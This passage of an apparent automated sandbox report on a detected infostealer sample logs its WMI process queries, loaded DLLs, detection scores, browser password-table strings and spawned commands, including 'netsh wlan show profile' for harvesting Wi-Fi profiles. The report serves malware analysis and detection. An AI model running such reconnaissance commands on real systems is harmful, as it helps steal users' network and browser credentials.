                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile read: C:\Users\user\Pictures\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: tmpD656.tmp.dat.0.dr, tmpD5E2.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: vYz1Z2heor.exeVirustotal: Detection: 71%
                              Source: vYz1Z2heor.exeReversingLabs: Detection: 86%
                              Source: vYz1Z2heor.exeString found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json
                              Source: unknownProcess created: C:\Users\user\Desktop\vYz1Z2heor.exe "C:\Users\user\Desktop\vYz1Z2heor.exe"
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
